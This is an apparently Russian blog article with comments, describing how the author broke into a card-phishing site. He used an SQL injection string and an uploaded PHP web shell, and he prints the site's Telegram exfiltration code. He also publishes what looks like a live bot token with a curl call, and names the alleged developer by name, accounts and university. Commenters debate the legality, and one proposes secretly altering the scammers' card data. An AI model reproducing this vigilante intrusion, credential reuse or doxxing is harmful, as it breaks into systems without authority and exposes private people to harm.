Аннотация
Каждый из нас может стать жертвой злоумышленника, но иногда хищник и добыча меняются местами.
Это краткая история о том, как неумелое использовании технологий может привести к раскрытию личности. Статья будет полезна как юным хакерам, желающим получить «легкие деньги», так и тем, кто хочет их поймать.
Введение
Одним февральским вечерком я был занят поиском места для романтичного свидания со своей возлюбленной. Через какое-то время мое внимание привлек сайт milleniumfilm.ru, не доступный в настоящее время. Сайт предоставлял услуги аренды небольших кинозалов для частного просмотра. Красивые картинки, умеренные цены, есть онлайн поддержка, одно но: данные банковской карты предлагалось ввести на не защищенной странице этого же домена. Насторожившись, я написал в техподдержку сайта, и мошенники не заставили себя долго ждать — поняв, что я достаточно технически грамотен послали меня на 3 буквы. Конечно, мошенникам нет смысла тратить на меня время, но зачем так грубо? — В любой ситуации нужно оставаться Человеком.
С отзывами о сайтах такого же плана можно ознакомиться тут: zhaloba-online.ru. Некоторые из них даже до сих пор работают.
Взлом
Чувствуя вселенскую несправедливость, с целью установления личности злоумышленника и пресечения его деятельности, я принялся изучать сайт на предмет уязвимостей.
Скриншот
1' or '1дал мне доступ к настройкам сайта.
Скриншот.
Данный скриншот был сделан после атаки, потому имя пользователя такое говорящее.
Сайт создателя данного творения Gelloiss.ru красовался на первой же странице. Особенно интересным оказался раздел «Банковские карты» — там отображались все введенные данные: фамилия и имя держателя карты, номер карты, срок действия, cvc2 и код подтверждения из смс.
Большой скриншот. Часть данных закрашена.
Как это работает.
Получив реквизиты банковской карты, злоумышленник делает запрос на перевод средств с карты и перенаправляется платежной системой на страницу 3D-secure, где нужно ввести код из смс. Код приходит в смс на телефон жертвы, который вводит его в форме сайта. Получив код из смс, мошенник вводит его на странице 3D-secure подтверждая транзакцию. Вся эта схема требует неотлагательный действий самого мошенника, что наводит на мысль, что сайт должен быстро уведомлять о наличии жертвы.
На странице «Настройка фильмов» была достаточно простая форма для формирования тексто-графических блоков. Функция загрузки картинки не фильтровала контент загружаемых файлов, что навело на мысль о возможности залить php-shell. Шелл успешно залился в /images/, откуда я его скопировал в корень сайта под названием login.php. Получив доступ к консоли, я принялся изучать внутренности сайта.
Список файлов.
Среди содержимого меня привлек файл telegram.php.
Код.
$ cat telegram.php
<?
function send_mess($text) {
$token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";
$mess = $text;
$chat = "-302359340";
/*return "<iframe style='width:500px; height:500px;' src='https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess."'></iframe>";*/
file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);
}PHP скрипт содержал в себе токен телеграм-бота и отправлял сообщения в чат при вызове функции send_mess. Поискав по коду сайта стало ясно, что именно с помощью телеграм-бота злоумышленнику отправляются данные карт, смс код.
grep
./cart.php:22:send_mess("Имя клиента: ".$name."%0D%0AEmail: ".$email."%0D%0AТелефон: ".$phone."%0D%0AДата посещения: ".$date."%0D%0A"."Время: ".$time."%0D%0AГород: ".$city."%0D%0AСумма: ".$sum."%0D%0AСписок заказанных услуг: ".$services."%0D%0AIP: ".$ip."%0D%0AЗабанить: ".$link_ban_ip);
./pay/ms.php:21: send_mess("Сумма: ".$sum."%0D%0AИмя владельца карты: ".$name."%0D%0AНомер карты: ".$num."%0D%0AСрок годности, месяц: ".$month."%0D%0AГод: ".$year."%0D%0Acvv: ".$cvv);Что ж, у нас есть токен телеграм-бота, chat_id, адрес создателя сайта на котором красуется skype «ura7887» и telegram «Gelloiss» (раньше telegram не был указан, потому для того чтобы убедиться что telegram-аккаунт принадлежит владельцу сайта я использовал наживку).
Скриншот с сайта gelloiss.ru
Выясним, кто создал чат, в который бот отсылает сообщения.
curl
$ curl "https://api.telegram.org/bot626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs/getChatAdministrators?chat_id=-302359340"
{"ok":true,"result":[{"user":{"id":365019332,"is_bot":false,"first_name":"Iskr\u00e1","username":"Gelloiss","language_code":"ru"},"status":"creator"}]}Как видно создатель чата имеет такой же username как и сайт создателя — «gelloiss».
Поиск
Помните: интернет ничего не забывает! Поиск по ключевым словам: «gelloiss», «ura7887», привел меня на страницу вконтакте Юрия Искры, где указан как сайт «Gelloiss.ru», так и skype «ura7887».
Скриншот.
А вот тут: vk.com видно, что данным скайп логином Юрий пользовался еще 6 лет назад, когда ему было 14 лет.
Скриншот.
А так же тут anime.anidub.com.
Скриншот.
Так же можно найти сообщение на форуме хакеров blackhacker.ru, с предложением продажи фишингового сайта.
Скриншот.
Проверка telegram
На момент начала истории, на сайте Gelloiss.ru не был указан логин telegram, потому мне нужно было связать владельца telegram-аккаунта с владельцем сайта или страницей вконтакте. Для этого я создал некий маркер, который владелец telegram-аккаунта должен будет разместить у себя.
shell
$ sha256sum <<< "i'm carder yuri iskra."
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 -Далее я написал в telegram и представившить потенциальным заказчиком предложил пройти проверку: попросил разместить маркер
Скриншот диалога telegram
Заключение
Лично у меня не осталось сомнений, что страница вконтакте принадлежит злоумышленнику. На момент взлома сайта, в базе данных было не менее 100 различных номеров карт, а к моменту закрытия сайта еще +100.
В заключение давайте посмотрим, где учится наш «герой». Это легко определить посмотрев где учатся его «друзья по вузу» на странице вконтакте.
Большой скриншот
Продолжение следует
Мне удалось получить доступ к сообщениям, которые отсылает бот. Масштабы бедствия поражают: за 3 месяца телеграм-бот отослал примерно 13 тысяч сообщений. Даже если предположить, что всего-лишь пятая часть полученных данных валидна, то список пострадавших превысит 2 тысячи человек. Хакер работает не один, а с сообщниками, которые завлекают клиентов и помогают с переводом средств. На данный момент злоумышленники получают паспортные данные, телефоны и номера карт с сайта moneyonline.world.
Update 2019-04-21: Поскольку пользователь gelloiss убеждает в комментариях, что не был в курсе, для каких целей сайт будет использоваться, привожу фрагмент дампа сообщений telegram:
Скрытый текст
Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message='Короче нужен сайт по «переводу карты на карту без комиссии» естесственно он должен высылать данные карты и код подтверждения мне', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\nТипа этого?)) \nДанные в телегу приходят', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ? это платежная система для тех, кто зарабатывает в интернете. Электронный кошелек, прием платежей и вывод денег, денежные переводы. Мгновенная регистрация, выгодные комиссии.', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | Электронный кошелек, платежи, прием и вывод денежных средств', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\nТипа этого?)) \nДанные в телегу приходят', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ? это платежная система для тех, кто зарабатывает в интернете. Электронный кошелек, прием платежей и вывод денег, денежные переводы. Мгновенная регистрация, выгодные комиссии.', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | Электронный кошелек, платежи, прием и вывод денежных средств', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
yurybx
Отличная работа! Остаётся теперь передать информацию органам, пусть выполнят свою работу.
pallada92
Я задумался, а тот, кто взламывает хакера, может тоже быть обвинен во взломе или соучастии? Тем более автор скачал дамп, содержащий данные этих карт. Или это квалифицируется как самооборона?
P.S. Что-то SQL инъекция слишком очевидная. Что если это ложная панель управления?
P.P.S. А что если автор этого сайта хотел подставить gelloiss? Зачем в админке с очевидной инъекцией гордо указывать автора? Если я не путаю, из статьи понятно, что Юрий Искра доказал, что он владелец gelloiss.ru, но не сайта milleniumfilm.ru. (хотя gelloiss создал telegram-чат, можно ли подделать создателя чата?)
SaturnTeam
По моему тот кто взламывает хакера тоже может быть обвинен. Если например самостоятельно схватить преступника который тебя обокрал вчера, то можно самому сесть по статье за ограничение свободы человека. Взломы должны проводиться лишь соответствующими органами.
olartamonov
Если рассматривать по УК РФ, то там есть нюанс — уголовным преступлением является не любой взлом, а «если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации».
То есть вот сохранять к себе на компьютер дамп сайта не стоило однозначно ни при каких условиях.
cyrillpetroff
А причем тут УК РФ, если Искра из Харькова? Скорее всего, ворует данные только у пострадавших с РФ, пользуясь «небратскими» отношениями сейчас у братских народов.
Надо, чтобы чел с Украины его за жабры взял…
saboteur_kiev
Люди которые воруют, не делят жертв на своих, чужих, у которых это лишние карманные или последние до следующей зарплаты. Они делят всех на «я и остальные лохи», а времена Робин Гудов давно закончились.
IMHO надо было в киберполицию это все слить.
Rsa97
edogs
Нас в этой статье всегда смущал нюанс.
По УК есть презумпция невиновности, до решения суда никакое деяние преступлением не является.
Поэтому сама фраза «задержать лицо совершившее преступление» формально абсурдна, ведь за что бы его не задержали — преступлением это будет только после решения суда.
Rsa97
Несколько не так.
УК РФ, ст. 14.1:
Для признания деяния преступлением не требуется решения суда. Суд определяет виновность обвиняемого в совершении преступления и меру наказания в случае вины.
edogs
Но Вы же просто расшифровали термин преступление, доказывать что было совершено «виновно совершенное общественно опасное деяние, запрещенное настоящим Кодексом под угрозой наказания» ака «преступление» все равно надо.
Да и УПК так же думает
А вот полиция (согласно УПК) может задерживать лишь по подозрению в совершении
rexen
Ну так чё получается? Если суд потом докажет, что
преступникподозреваемый совершил преступление, то «активистам» — «всем спасибо, все свободны». Если же будет вынесено оправдание, то...?mayorovp
Зато после решения суда оказывается, что деяние было преступлением всегда, а не стало таковым только что. Иначе абсурдной была бы уже фраза «преступление совершено».
olartamonov
Формально — да. Ст. 272 ч. 1 УК РФ, сохранять дамп найденного к себе на компьютер не стоило совершенно точно.
Самооборона — это когда здоровью или жизни что-то непосредственно угрожает. А в данном случае правильным порядком действий с точки зрения УК примерно любой страны является обращение потерпевших в органы (и очевидная проблема — потерпевшим является тот, у кого деньги уже украли, при этом в силу специфики преступления найти других потерпевших трудно).
yarkov
То есть я могу задержать воришку и лещами аккуратно его положить на землю до приезда полиции? И мне ничего не будет, если я не сверну ему хобот нечаянно?
olartamonov
Да.
pyrk2142
Тут существует потенциально крайне неприятная тонкость: если воришка получил вред здоровью средней тяжести при задержании, либо получил этот вред после, но убедил полицию/экспертов, что получил их во время задержания, то вы очень рискуете. Особенно, если воришка выглядит грустно, а окружающим его жалко.
seri0shka
Тут ещё одна тонкость- что посчитают вредом здоровью средней тяжести? Когда мой кум (на тот момент ещё просто коллега) попал в больницу после избиения, на его телесные повреждения «средней тяжести» нельзя было взглянуть без слёз. Но зная наши органы… могут ведь и наоборот перевернуть.
Rsa97
Есть приказ Министерства здравоохранения, устанавливающий «медицинские критерии квалифицирующих признаков тяжести вреда здоровью». Оценку производит судмедэксперт.
Если кратко, то лёгкий вред — нетрудоспособность до 21 дня и потеря до 10% общей трудоспособности.
ivanrt
10% это перманентно или на ограниченный период? Интересно а как можно оценить трудоспособность?
Rsa97
Это перманентно. Оценка производится по специальным таблицам в приложении к тому же приказу. 10% это, например, черепно-мозговая травма, повлекшая за собой значительно выраженные вегетативные симптомы (тремор век и пальцев рук, высокие сухожильные рефлексы, вазомоторные нарушения и др.).
misery-hacker Автор
Такой вариант тоже возможен, но близок к невероятным. Создателя чата подделать невероятно сложно, но можно украсть сам телеграм аккаунт. Сообщения в чате есть как минимум с января, а значит украденный телеграмм аккаунт на сайте более 3х месяцев. (Хотя я то знаю, что он там [на сайте] появился совсем недавно). Напомню, что владелец телеграмм аккаунта разместил маркер на сайте gelloiss.ru
Если продолжить рассматривать маловероятные сценарии, то скорее кто-то много-много лет пытается подставить Юрия: писал от его имени различные сообщения на хакерских форумах, указывая для связи его скайп.
solver
Ну почему сразу подставить Юрия?
Вам знакомо поняте «кража личности»?
Просто кто-то мог взять себе данные реального человека и творить сови делишки…
200sx_Pilot
Ну т накажут ТС по всей строгости закона за взлом, за обман доверчивого мошенника, за добычу персональных данных, приклеют ему же фишинг на основании найденных НА ЕГО компьютере данных банковских карт и иной конфедициальной информации…
Скорее всего, будет квалифицировано как превышение пределов необходимой обороны.
QtRoS
Кажется, добытые незаконно доказательства таковыми не являются. Поэтому привлечь внимание можно, но гарантий никаких нет, хотя наводка знатная.
ClearAirTurbulence
Мы не в Америке. Но гарантии есть — что сядет обратившийся.
olartamonov
Для начала, посторонние граждане вообще добычей доказательств не занимаются и заниматься не могут. Максимум, что они могут — в соответствии со ст. 140 ч. 1 УПК РФ сообщить «о совершенном или готовящемся преступлении».
misery-hacker Автор
Знакомый человек близкий к органам считает, что в виду сложных отношений с Украиной, подозреваемому ни чего не угрожает. Гораздо действенней может оказаться социальное давление, или действия службы безопасности банка (клиенты которого пострадали). В любом случае, без заявлений пострадавших — делу ход не дать.
pallada92
Я не очень понимаю, как вообще работают мошеннические схемы с выводом денег при онлайн-оплате картами. Разве при оплате картой они не перечисляются со значительной задержкой, во время которой клиент может оспорить платеж? А если много клиентов требуют вернуть деньги, банк должен вообще заблокировать счет. Плюс для снятия денег, наверное, нужно предъявить кучу документов.
walkman7
А где гарантии того что деньги выводятся на счет? Вот пару месяцев назад, открыл для себя новый вид обналички, скамер после получения данных производит обмен фиата на крипту в обменнике с автообменом. И что сдесь блокировать? Целый блокчейн? Обменник?
AlexanderS
А вы пробовали когда-нибудь отменить сделанный платёж? В США это можно сделать в течение месяца. У нас же — только по личному походу в банк и на это отводятся только сутки.
Speakus
Я пробовал. Купил игру в стиме помеченную что она с русским — но она оказалась с русским только для Windows. Сам стим хотел вернуть фантики на их счету — но я не планировал никаких покупок игр в стиме — поэтому этот вариант меня не устроил. Написал в поддержку карты и приложил переписку со стимом. Деньги вернули за 30 дней. Никакого посещения офиса не потребовалось. Если бы отказались можно было бы вернуть через мастеркард приложив переписку с банком.
AlexanderS
Что за банк, если не секрет?
Speakus
Кажется это была карта «кукуруза». Но более я её рекомендовать не могу.
2. Поменял паспорт и их поддержка (через «связной») долго не могла правильно обработать моё заявление — пополнить карту я не мог довольно долго из-за этого.
9660
Купил как-то игру в стиме (с полгода назад), деньги списали. Игра оказалась для виндовз, в поддержке стима завел по шаблону тикет, через день вернули деньги в карту. Давно ваш случай был?
Speakus
Очень давно — может 3-5 лет назад
Gelloiss
Отменял покупку игры в google play. При чем, отменил я ее дня через два, после покупки. Вообще, на кнопку нажал только ради интереса, ибо «как это так, я деньги отдал, игра у меня, а теперь можно обратно вернуть?». Ну и игра удалилась, а деньги вернулись)
me21
Оплатил как-то раз билайновский интернет, деньги почему-то на счёт не пришли (один раз такое было). Да, пришлось сходить лично в банк, но лимита в сутки нет. Написал заявление, через какое-то время деньги вернули. Процедура, строго говоря, не банковская, а платёжной системы (чарджбэк).
VSOP_juDGe
Тинькофф мне пару раз возвращал деньги (один раз ошибочно два раза списали в магазине, воторой раз онлайн-мошенники продали левый ключ к игре) по телефонному обращению. Никаких суток и походов в банк.
Vilgelm
У меня была ситуация когда Aliexpress по какой-то причине заморозил заказ и аккаунт. Писал в чат Тинькофф, приложил скриншоты — они создали обращение, которое провисело недели две и деньги вернулись. Однако уверенности в том, что это сделал банк, а не сам Али у меня нет, по срокам если честно больше подходит под возврат с Али. Тем не менее такая возможность действительно есть.
Speakus
Однозначно проблема будет вернуть если перевод был физлицу.
pallada92
Точно, не подумал об этом.
kimisa
Была ситуация такого рода. Подруга играет в он-лайн игру и периодически делает покупки. В один момент ей посыпались смс со списанием денег по аналогичной услуге, но она на данный момент не едлала никаких покупок. Ладно хоть денег на этой карте было 2000 руб.
Но ни обращение в гугл, ни в банк не вернули эти деньги. Типа нет доказательств, что эти платежи мошеннические.
Vilgelm
Насколько я понимаю в статье речь идет о card2card переводах, а их оспорить довольно таки сложно (хотя несколько лет назад даже закон принимали, по которому в течении суток любую транзакцию можно оспорить). Но техническая возможность у банка есть, например я один раз пытался перевести 30к через card2card, банк сам молча сначала заморозил, а потом отменил транзакцию (правда есть нюанс, c2c сервис принадлежал банку, который выпустил карту отправителя).
А вообще по правилам Visa и MC можно вообще в течении 60 дней или около того вернуть деньги. Это называется чарджбэк. Но процедура достаточно сложная и я не думаю что она распространяется на что-то, кроме операций покупок (а c2c перевод такой операцией не является).
Stepan555
В бантустане этого Юрия Искры «органы» разве что в долю войти могут. Да ещё «звезду хероя» выдать за «подвиг». Хероям слава!
Xander_Vi
Вот человека заминусовали, а я, как житель Украины, поддержу его слова — с большей вероятностью наши представители правоохранительных органов будут крышевать такой прибыльный бизнес (согласно данных, указанных в статье — 13 тысяч сообщений и 2000 предполагаемых жертв), чем бороться с ним.
К сожалению, таковы реалии нашей страны — зарплата сотрудников киберполиции далека даже от зарплаты джуна в нормальной аутсорс компании, так что выживают, как могут (я не одобряю и не поддерживаю такое положение дел, просто констатирую факт).
Но на счет «звезды хероя» — это, конечно, перебор) Всё будет сделано максимально тихо и незаметно.
UnrealQW
Но таким образом прибыль от незаконных действий будет размазана и на других участников. А, значит, разработчик получит меньше денег (не говоря уже о других проблемах при работе с коррумпированной полицией). И в итоге хакер может решить, что доход слишком мал, чтобы так мараться; найдет нормальную работу.
SantaCluster
сдаётся мне, попытка "соскочить" может оказаться дороже продолжения делиться
saboteur_kiev
1. я, как житель Украины, скажу что сайт никаким образом не определяет житель какой страны спалил данные своей карточки.
2. Опять же зарплата сотрудников киберполиции невелика, они тем более не будут разбирать что да как. Но для возбуждения уголовного дела, нужно чтобы в полицию обратился постардавший. Обратится — проведут расследование. А завершенные дела киберполиции очень нужны, тем более такие, где нарушитель не сын очередного депутата.
Rsa97
saboteur_kiev
Ну если на улице лежит мертвый человек, обычно дело об убийстве сразу не заводится.
Сперва вызывается скорая, а дело об убийстве — если есть подозрение на убийство, а не на инфаркт. Так и тут — киберполиция вообще не знает о существовании сайта.
Я может не совсем корректно сказал, что только пострадавший может обратиться. Но в общем случае да, без пострадавшего будет сложно понять что расследовать.
В конкретном нашем случае, есть контакты с карточек — можно передать их, пусть полиция свяжется.
firedragon
Молодец, давить таких нужно.
jevius
Он не хакер, а малолетний дебил. Всего его хаки — соц. инженерия.
На бутылкуmisery-hacker Автор
Мне казалось, habrahabr не место для подобных высказываний.
edogs
jevius
Обманывать людей уже признак не очень умного человека. А если ты хорош на выдумки того, как именно обмануть, это не показатель ума.
alsoijw
fotofan
По вашей логике разведчики, актёры и даже врачи не блещут умом?
saboteur_kiev
Хм.На текущий момент, самые крупные в денежном смысле преступления были сделаны при помощи обмана и социальной инженерии.
Dioxin
Обманывать людей уже признак не очень умного человека
Возможно вы имели ввиду что строить свою жизнь на обмане это не совсем умно?
Тогда да, это так. Хорошая репутация это самая хорошая стратегия.
Но! Элементы обмана присутствую везде в какой-то мере, без этого никуда.
Думаю Митник врет напропалую, пытаясь найти брешь в системе безопасности компании которая заказала ему аудит.
S-trace
>Обманывать людей уже признак не очень умного человека.
Что поделать, если сейчас проще обмануть человека, чем машину?
Вот и выкручиваются как могут, «хакеры».
Хотя, по мне — им таким нужно другое название придумать. Как вам «шулеры»?
alsoijw
jevius
Я правильно понимаю что хабрасообщество осуждает критику преступлений?
nidalee
Ваши комментарии не несут смысловой нагрузки, просто эмоции в воздух. Лично мне не очень интересно, что вы думаете об этом человеке. Я вас не минусовал по понятным причинам.
jevius
Мальчика назвали хакером, я сказал что он не является хакером. Всё. Словил кучу минусов. (Куча примеров, где в комментах пишут свои эмоции пользователи, и все ок. Но если ты пишешь не про хорошие эмоции — кик. Что ж)
alsoijw
saboteur_kiev
compare string — result false.
S-trace
Ну да, давайте ещё будем выискивать места, где вместо короткого тире длинное поставилось из-за дрогнувшего пальца и двух минусов подряд в тексте)
Смысл высказываний одинаков, так что true == Thoughts.compare(thoughFirst, thoughSecond);
edogs
1) «Он не хакер» — в современной терминологии хакер это «компьютерный злоумышленник», т.е. Вы по сути говорите что он «не компьютерный злоумышленник» Где тут критика? Да пес с ней с критикой, где логика?
2) «Он малолетний» — даже если так, то почему Вы это произносите в негативном ключе, разве есть что-то позорное в том что бы быть малолетним?
3) «дебил» — термин дебил это объективный показатель низкого IQ, условно говоря. У Вас не только нет оснований так заявлять, но и называя его так, Вы косвенно называете людей которых он обманул еще бОльшими дебилами — двойной фэил.
4) «Всего его хаки — соц. инженерия» — это уже писали, но еще раз — соц.инжинерия это тоже хакерство.
5) Мало того, Вы вообще не критикуете преступление, вся Ваша фраза направлена в адрес человека, а не его деяния.
fukkit2
Детям присущ эгоцентризм и правовой нигилизм. Для них упрощение мира до "+" и "-", и отражение его через собственную недоразвитую эмоциональную сферу является наиболее естественной формой реакции вообще на всё.
engine9
Не путайте объективную критику и личное осуждение.
saboteur_kiev
Некий (возможно даже хакер?) Кевин Митник, регулярно пользовался социальной инженерией, и даже утверждал, что «от человеческой глупости нет патча».
daniillnull
Особенно забавляет, как он в 2016 на своем сайте писал про свое отношение к «грязным проектам».
TimsTims
> свое отношение к «грязным проектам»
Обычно нормальным людям стыдно такое говорить, а этому нет. Значит он изначально был готов на то, чтобы у кого-то что-то украсть. Плюс очень странно, что он вообще на этом акцентировал внимание, как будто тебя сразу же после публикации каждый день засылают предложениями о работе на черный рынок…fantik22
Засылают… Ещё как! Сам лично с этим сталкивался. После регистрации на одной фриланс бирже разместил своё резюме, спустя день на почте было около 7-ми писем с предложениями аля «Нужен веб-девелопер для разработки фишинг-сайта» и не сказал бы что ценник сильно отличался от белых проектов, в некоторых случаях даже был меньше
1c80
Не очень понятно, Юрику заказали сайт и он его сделал, отдал заказчику и поддерживает,
какие претензии к нему могут быть?
Он ведь не владелец сайта milleniumfilm.ru, а у что там заказчик разместил и для чего использует, не его проблемы.
olartamonov
А это уже «деяния, совершенные группой лиц по предварительному сговору». За них ещё больше дают.
edogs
Дело в том, что не просто «группой лиц», а «по предварительному сговору». И сговор это не просто заказ на разработку сайта, а именно сговор с умыслом совершить преступление. Иначе можно было бы сажать всех — производителя компьютера, платного репетитора, хостера и т.д… — всю группу лиц которая хоть как-то участвовала.
Sabubu дело в том., что карточная система изначально пришла из сша/европы, где в случае мошенничества банк/платежная система без проблем возмещает ущерб. Для россии это тоже отчасти работает, только немного через ж-пу, но в принципе через визу/МС вполне можно вернуть мошеннический платеж в возврате которого откажет банк. В общем by design мошенничество никого не парило, т.к. деньги клиентам возвращались.Мало того, если подумать, то из поста не следует что сайт мошенник. Просит ввести данные карты? Ну и? А кто при оплате не просит?
Букинг, например, тоже просит ввести цвв у себя на сайте и мало того, данные карт передает отелям прямым текстом. habr.com/en/post/442378
Знаем как минимум 2 реальных агрегатора/поисковика для покупки авиабилетов где сайт поступает так же, просит ввести данные карты у себя на сайте, один тоже телеграмм ботом их отсылает.
ссл сертификата нет? Тоже не признак мошенничества. А то что автора послали на три буквы — опять же, обидно, но не мошенничество.
Т.е. это все конечно bad practice, может быть даже АК за обработку ПД, но никак не УК — в рамках данной доказательной базы.
Вот если бы автор пробил по адресу «кинотеатр» и обнаружил бы что его там нет или что сайт не имеет к нему отношнеие — это был бы аргумент (если кинотеатр реально есть и это его владелец, то в чем нарушение?), опять же не финальный, т.к. для финального необходимо еще доказать материальный ущерб (создатель сайта может отмазаться тем, что он пишет дипломный проект о легковерии идиотов в интернете).
На случай если кто-то бросился писать гневный коммент на тему что мы защищаем мошенника — нет, мы как раз объясняем почему поспешные обвинения могут оказаться пшиком и чуть что развалиться и что надо их строить на более сильной базе.
Что касается возможности притянут ТС за «взлом», то статья 12 и 14 гк в принципе дают ему определённую свободу действий (самозащита прав), т.к. он действовал в целях пресечения правонарушения и не создал дополнительного ущерба.
Еще нюанс в том, что в ряде случаев оплата вообще совершается без участия банка в момент оплаты, т.н. оффлайн платежи. В банк данные об оплате приходят пост-фактум и он его в принципе задержать не может.
И добивает эту ситуацию тот факт, что прием оплаты зависит от мерчанта. Мерчант может его настроить так, что бы никаких лишних проверок не было и даже cvv не требовался. В таких случаях платеж намного легче вернуть, но некоторые мерчанты осознанно идут на такой риск в целях клиентоориентированности (не в целях мошенничества, т.к. штрафы там дикие при большом количестве возвратов, нет смысла).
Угу. Или на авито что-нибудь купить с предоплатой. Мол я сейчас Вам денег на карту скину, а вечером заеду товар заберу. Вы такой радостный что у Вас товар купили, а завтра к Вам маски-шоу за полученный мошенничеством платеж на карту с изьятием компьютера и тыды.
S-trace
>А кто при оплате не просит?
Ну так-то подавляющие все честные сайты работают через платёжных агрегаторов, поскольку сертифицировать себя для обработки ТАКИХ данных стоит 100500 нефтей.
>Букинг, например, тоже просит ввести цвв у себя на сайте и мало того, данные карт передает отелям прямым текстом. habr.com/en/post/442378
Скажите ещё, что вы пользуетесь этим сайтом для каких-то ещё целей, кроме поиска вариантов отелей?
Мне вот почему-то куда больше доверия к цепочке «поискал на букинге=>нашёл отель=>нашёл сайт отеля=>забронировал номер на сайте отеля». Хотя бы по той простой причине, что в таком случае не будет проблем если синхронизация между букингом и отелем сломана/глючит/тормозит, и от этого букинг продаёт брони на уже заселённые в оффлайне на стойке регистрации номера.
>ссл сертификата нет? Тоже не признак мошенничества.
Но таки верный smell.
Если владелец сайта даже в Let'sEncrypt сертификат себе не может — фтопку.
>И добивает эту ситуацию тот факт, что прием оплаты зависит от мерчанта. Мерчант может его настроить так, что бы никаких лишних проверок не было и даже cvv не требовался.
И таки да, и даже некоторые благотворительные организации таким не брезгуют (пальцем указывать не буду, но столкнулся).
dartraiden
А то, что Юрик размещал объявления о разработке и продаже фишигового сайта, это чистое совпадение. Если он сделал сайт, прекрасно понимая, что он делает и для кого, то претензии к нему есть и ещё какие.
1c80
а как это доказать? он как я вижу совсем противоположенное пишет и сам сайт уже выключен и находится на украине, так что до него уже не добраться, потому возможно самое оптимальное для ТС, удалить статью и спрятать подальше следы своей работы, по выводу мошенника на чистую воду.
dartraiden
Альтернативная версия какая? Что кто-то был настолько дальновиден, что 4 года назал указал ник и скайп Юрия в объявлении о продаже фишингового сайта, затем создал телеграм-аккаунт с таким же именем и аватаркой, создал с этого аккаунта бота для приёма украденных данных, зарегистрировал ещё один сайт gelloiss.ru, накидал туда ссылок на профили Юрия и ждал годы, пока это вскроется, чтобы подставить Юрия?
Вариант «кибермошенники зачастую умом не отличаются» намного вероятнее.
1c80
все может быть, даже и такое, а может купил шаблон 4 года назад и до сих пор клепает на нем сайты сливая все на один чат, Вы серьезно думаете, что там всего один сайт в работе?
MacIn
Допустим, это identity theft?
А «основная» какая — что человек настолько туп, что наследил где только можно, пользуется одним и тем же аккаунтом для личных дел и грязной работы?
1c80
Это к безопасности ТС относился комментарий, а не тому что бы скрыть следы деятельности этих людей, думаю тут вообще партнёрка, эти сайты уже много лет существуют мне сказали и их много разных, сауны, номера. Область поиска клиентов это сайты СЗ в основном.
1c80
Если докажут, то да.
А если поленятся, или окажется, что Юра не при чем, то может попасть и ТС.
dartraiden
Просто это популярная схема развода: девушка знакомится в сети с молодым человеком, убалтывает его пойти в кино и скидывает ссылку на сайт кинотеатра, ну а дальше — ни денег, ни девушки (конечно, на том конце никакая не девушка, а всё тот же мошенник).
Valeratal
Плюс 1. Тоже слышал о таком разводе
misery-hacker Автор
Это не тот случай.
lubezniy
Если не рассматривать вариант обращений в правоохранительные органы или банки, есть вариант расшатать систему сбора денег изнутри — например, добавив на сайт подмену пары произвольных цифр в cvc/cvv на случайные (разумеется, в логи и далее «клиенту» должны выдаваться подменённые данные). Тут уже и банки, и клиенты сами прочухают неладное, а кардеры могут заподозрить «вебмастера» в «измене» и разобраться с ним своими методами. Можно ещё регистратору домена отправить жалобу на владельца домена, чтобы тот его забанил и запретил другие домены регить, хоть это может оказаться неэффективно.
JerleShannara
У половины таких сайтов «платежные шлюзы» смешные и никакой проверки вводимых данных не осуществляют, ну а дальнейшее сугубо на совести того, кто что в этот шлюз вобьёт.
lubezniy
Подавать случайную инфу — это первое, что приходит в голову. Но атака с передачей всех случайных данных не позволит банкам предупредить клиентов о подозрительных транзакциях по карте. А так, когда номер карты будет реальным, а cvv нет, банки-эмитенты быстро увидят, что что-то не так, и заодно начнут копать сами — не через правоохранительные органы, так через международные платёжные системы.
submagic
Я бы в подобном случае поступил бы именно так. У меня был похожий случай несколько лет назад — и я, так сказать, кое-что подправил мошенникам в их системе. Не знаю, что с ними там стало дальше, но через несколько месяцев их ресурсы и аккаунты перестали функционировать.
Sabubu
